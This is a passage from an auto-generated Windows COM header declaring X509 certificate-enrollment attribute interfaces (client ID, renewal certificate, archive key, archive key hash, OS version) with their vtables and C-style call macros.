        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_UserSamName )( 
            __RPC__in IX509AttributeClientId * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ProcessName )( 
            __RPC__in IX509AttributeClientId * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        END_INTERFACE
    } IX509AttributeClientIdVtbl;

    interface IX509AttributeClientId
    {
        CONST_VTBL struct IX509AttributeClientIdVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509AttributeClientId_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509AttributeClientId_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509AttributeClientId_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509AttributeClientId_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509AttributeClientId_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509AttributeClientId_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509AttributeClientId_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509AttributeClientId_Initialize(This,pObjectId,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> Initialize(This,pObjectId,Encoding,strEncodedData) ) 

#define IX509AttributeClientId_get_ObjectId(This,ppValue)	\
    ( (This)->lpVtbl -> get_ObjectId(This,ppValue) ) 

#define IX509AttributeClientId_get_RawData(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawData(This,Encoding,pValue) ) 


#define IX509AttributeClientId_InitializeEncode(This,ClientId,strMachineDnsName,strUserSamName,strProcessName)	\
    ( (This)->lpVtbl -> InitializeEncode(This,ClientId,strMachineDnsName,strUserSamName,strProcessName) ) 

#define IX509AttributeClientId_InitializeDecode(This,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> InitializeDecode(This,Encoding,strEncodedData) ) 

#define IX509AttributeClientId_get_ClientId(This,pValue)	\
    ( (This)->lpVtbl -> get_ClientId(This,pValue) ) 

#define IX509AttributeClientId_get_MachineDnsName(This,pValue)	\
    ( (This)->lpVtbl -> get_MachineDnsName(This,pValue) ) 

#define IX509AttributeClientId_get_UserSamName(This,pValue)	\
    ( (This)->lpVtbl -> get_UserSamName(This,pValue) ) 

#define IX509AttributeClientId_get_ProcessName(This,pValue)	\
    ( (This)->lpVtbl -> get_ProcessName(This,pValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509AttributeClientId_INTERFACE_DEFINED__ */


#ifndef __IX509AttributeRenewalCertificate_INTERFACE_DEFINED__
#define __IX509AttributeRenewalCertificate_INTERFACE_DEFINED__

/* interface IX509AttributeRenewalCertificate */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509AttributeRenewalCertificate;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab326-217d-11da-b2a4-000e7bbb2b09")
    IX509AttributeRenewalCertificate : public IX509Attribute
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE InitializeEncode( 
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCert) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE InitializeDecode( 
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_RenewalCertificate( 
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct IX509AttributeRenewalCertificateVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509AttributeRenewalCertificate * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509AttributeRenewalCertificate * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509AttributeRenewalCertificate * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509AttributeRenewalCertificate * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509AttributeRenewalCertificate * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509AttributeRenewalCertificate * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509AttributeRenewalCertificate * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in IX509AttributeRenewalCertificate * This,
            /* [in] */ __RPC__in_opt IObjectId *pObjectId,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ObjectId )( 
            __RPC__in IX509AttributeRenewalCertificate * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawData )( 
            __RPC__in IX509AttributeRenewalCertificate * This,
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeEncode )( 
            __RPC__in IX509AttributeRenewalCertificate * This,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCert);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeDecode )( 
            __RPC__in IX509AttributeRenewalCertificate * This,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RenewalCertificate )( 
            __RPC__in IX509AttributeRenewalCertificate * This,
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        END_INTERFACE
    } IX509AttributeRenewalCertificateVtbl;

    interface IX509AttributeRenewalCertificate
    {
        CONST_VTBL struct IX509AttributeRenewalCertificateVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509AttributeRenewalCertificate_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509AttributeRenewalCertificate_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509AttributeRenewalCertificate_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509AttributeRenewalCertificate_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509AttributeRenewalCertificate_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509AttributeRenewalCertificate_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509AttributeRenewalCertificate_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509AttributeRenewalCertificate_Initialize(This,pObjectId,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> Initialize(This,pObjectId,Encoding,strEncodedData) ) 

#define IX509AttributeRenewalCertificate_get_ObjectId(This,ppValue)	\
    ( (This)->lpVtbl -> get_ObjectId(This,ppValue) ) 

#define IX509AttributeRenewalCertificate_get_RawData(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawData(This,Encoding,pValue) ) 


#define IX509AttributeRenewalCertificate_InitializeEncode(This,Encoding,strCert)	\
    ( (This)->lpVtbl -> InitializeEncode(This,Encoding,strCert) ) 

#define IX509AttributeRenewalCertificate_InitializeDecode(This,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> InitializeDecode(This,Encoding,strEncodedData) ) 

#define IX509AttributeRenewalCertificate_get_RenewalCertificate(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RenewalCertificate(This,Encoding,pValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509AttributeRenewalCertificate_INTERFACE_DEFINED__ */


#ifndef __IX509AttributeArchiveKey_INTERFACE_DEFINED__
#define __IX509AttributeArchiveKey_INTERFACE_DEFINED__

/* interface IX509AttributeArchiveKey */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509AttributeArchiveKey;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab327-217d-11da-b2a4-000e7bbb2b09")
    IX509AttributeArchiveKey : public IX509Attribute
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE InitializeEncode( 
            /* [in] */ __RPC__in_opt IX509PrivateKey *pKey,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCAXCert,
            /* [in] */ __RPC__in_opt IObjectId *pAlgorithm,
            /* [in] */ LONG EncryptionStrength) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE InitializeDecode( 
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_EncryptedKeyBlob( 
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_EncryptionAlgorithm( 
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_EncryptionStrength( 
            /* [retval][out] */ __RPC__out LONG *pValue) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct IX509AttributeArchiveKeyVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509AttributeArchiveKey * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509AttributeArchiveKey * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509AttributeArchiveKey * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509AttributeArchiveKey * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509AttributeArchiveKey * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509AttributeArchiveKey * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509AttributeArchiveKey * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in IX509AttributeArchiveKey * This,
            /* [in] */ __RPC__in_opt IObjectId *pObjectId,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ObjectId )( 
            __RPC__in IX509AttributeArchiveKey * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawData )( 
            __RPC__in IX509AttributeArchiveKey * This,
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeEncode )( 
            __RPC__in IX509AttributeArchiveKey * This,
            /* [in] */ __RPC__in_opt IX509PrivateKey *pKey,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCAXCert,
            /* [in] */ __RPC__in_opt IObjectId *pAlgorithm,
            /* [in] */ LONG EncryptionStrength);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeDecode )( 
            __RPC__in IX509AttributeArchiveKey * This,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_EncryptedKeyBlob )( 
            __RPC__in IX509AttributeArchiveKey * This,
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_EncryptionAlgorithm )( 
            __RPC__in IX509AttributeArchiveKey * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_EncryptionStrength )( 
            __RPC__in IX509AttributeArchiveKey * This,
            /* [retval][out] */ __RPC__out LONG *pValue);
        
        END_INTERFACE
    } IX509AttributeArchiveKeyVtbl;

    interface IX509AttributeArchiveKey
    {
        CONST_VTBL struct IX509AttributeArchiveKeyVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509AttributeArchiveKey_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509AttributeArchiveKey_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509AttributeArchiveKey_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509AttributeArchiveKey_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509AttributeArchiveKey_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509AttributeArchiveKey_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509AttributeArchiveKey_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509AttributeArchiveKey_Initialize(This,pObjectId,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> Initialize(This,pObjectId,Encoding,strEncodedData) ) 

#define IX509AttributeArchiveKey_get_ObjectId(This,ppValue)	\
    ( (This)->lpVtbl -> get_ObjectId(This,ppValue) ) 

#define IX509AttributeArchiveKey_get_RawData(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawData(This,Encoding,pValue) ) 


#define IX509AttributeArchiveKey_InitializeEncode(This,pKey,Encoding,strCAXCert,pAlgorithm,EncryptionStrength)	\
    ( (This)->lpVtbl -> InitializeEncode(This,pKey,Encoding,strCAXCert,pAlgorithm,EncryptionStrength) ) 

#define IX509AttributeArchiveKey_InitializeDecode(This,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> InitializeDecode(This,Encoding,strEncodedData) ) 

#define IX509AttributeArchiveKey_get_EncryptedKeyBlob(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_EncryptedKeyBlob(This,Encoding,pValue) ) 

#define IX509AttributeArchiveKey_get_EncryptionAlgorithm(This,ppValue)	\
    ( (This)->lpVtbl -> get_EncryptionAlgorithm(This,ppValue) ) 

#define IX509AttributeArchiveKey_get_EncryptionStrength(This,pValue)	\
    ( (This)->lpVtbl -> get_EncryptionStrength(This,pValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509AttributeArchiveKey_INTERFACE_DEFINED__ */


#ifndef __IX509AttributeArchiveKeyHash_INTERFACE_DEFINED__
#define __IX509AttributeArchiveKeyHash_INTERFACE_DEFINED__

/* interface IX509AttributeArchiveKeyHash */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509AttributeArchiveKeyHash;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab328-217d-11da-b2a4-000e7bbb2b09")
    IX509AttributeArchiveKeyHash : public IX509Attribute
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE InitializeEncodeFromEncryptedKeyBlob( 
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncryptedKeyBlob) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE InitializeDecode( 
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_EncryptedKeyHashBlob( 
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct IX509AttributeArchiveKeyHashVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509AttributeArchiveKeyHash * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509AttributeArchiveKeyHash * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509AttributeArchiveKeyHash * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509AttributeArchiveKeyHash * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509AttributeArchiveKeyHash * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509AttributeArchiveKeyHash * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509AttributeArchiveKeyHash * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in IX509AttributeArchiveKeyHash * This,
            /* [in] */ __RPC__in_opt IObjectId *pObjectId,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ObjectId )( 
            __RPC__in IX509AttributeArchiveKeyHash * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawData )( 
            __RPC__in IX509AttributeArchiveKeyHash * This,
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeEncodeFromEncryptedKeyBlob )( 
            __RPC__in IX509AttributeArchiveKeyHash * This,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncryptedKeyBlob);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeDecode )( 
            __RPC__in IX509AttributeArchiveKeyHash * This,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_EncryptedKeyHashBlob )( 
            __RPC__in IX509AttributeArchiveKeyHash * This,
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        END_INTERFACE
    } IX509AttributeArchiveKeyHashVtbl;

    interface IX509AttributeArchiveKeyHash
    {
        CONST_VTBL struct IX509AttributeArchiveKeyHashVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509AttributeArchiveKeyHash_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509AttributeArchiveKeyHash_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509AttributeArchiveKeyHash_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509AttributeArchiveKeyHash_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509AttributeArchiveKeyHash_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509AttributeArchiveKeyHash_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509AttributeArchiveKeyHash_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509AttributeArchiveKeyHash_Initialize(This,pObjectId,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> Initialize(This,pObjectId,Encoding,strEncodedData) ) 

#define IX509AttributeArchiveKeyHash_get_ObjectId(This,ppValue)	\
    ( (This)->lpVtbl -> get_ObjectId(This,ppValue) ) 

#define IX509AttributeArchiveKeyHash_get_RawData(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawData(This,Encoding,pValue) ) 


#define IX509AttributeArchiveKeyHash_InitializeEncodeFromEncryptedKeyBlob(This,Encoding,strEncryptedKeyBlob)	\
    ( (This)->lpVtbl -> InitializeEncodeFromEncryptedKeyBlob(This,Encoding,strEncryptedKeyBlob) ) 

#define IX509AttributeArchiveKeyHash_InitializeDecode(This,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> InitializeDecode(This,Encoding,strEncodedData) ) 

#define IX509AttributeArchiveKeyHash_get_EncryptedKeyHashBlob(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_EncryptedKeyHashBlob(This,Encoding,pValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509AttributeArchiveKeyHash_INTERFACE_DEFINED__ */


#ifndef __IX509AttributeOSVersion_INTERFACE_DEFINED__
#define __IX509AttributeOSVersion_INTERFACE_DEFINED__

/* interface IX509AttributeOSVersion */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509AttributeOSVersion;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab32a-217d-11da-b2a4-000e7bbb2b09")
    IX509AttributeOSVersion : public IX509Attribute
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE InitializeEncode( 
            /* [in] */ __RPC__in BSTR strOSVersion) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE InitializeDecode( 
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_OSVersion( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct IX509AttributeOSVersionVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509AttributeOSVersion * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509AttributeOSVersion * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509AttributeOSVersion * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509AttributeOSVersion * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509AttributeOSVersion * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509AttributeOSVersion * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509AttributeOSVersion * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in IX509AttributeOSVersion * This,
            /* [in] */ __RPC__in_opt IObjectId *pObjectId,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ObjectId )( 
            __RPC__in IX509AttributeOSVersion * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawData )( 
            __RPC__in IX509AttributeOSVersion * This,
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeEncode )( 
            __RPC__in IX509AttributeOSVersion * This,
            /* [in] */ __RPC__in BSTR strOSVersion);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeDecode )( 
            __RPC__in IX509AttributeOSVersion * This,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
